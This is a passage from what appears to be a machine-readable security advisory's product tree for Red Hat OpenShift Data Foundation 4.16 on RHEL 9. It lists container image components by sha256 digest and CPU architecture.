"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", }, product_reference: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", }, product_reference: "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", }, product_reference: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", }, product_reference: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", }, product_reference: "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", }, product_reference: "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", }, product_reference: "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", }, product_reference: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", }, product_reference: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", }, product_reference: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", }, product_reference: "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", }, product_reference: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", }, product_reference: "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: 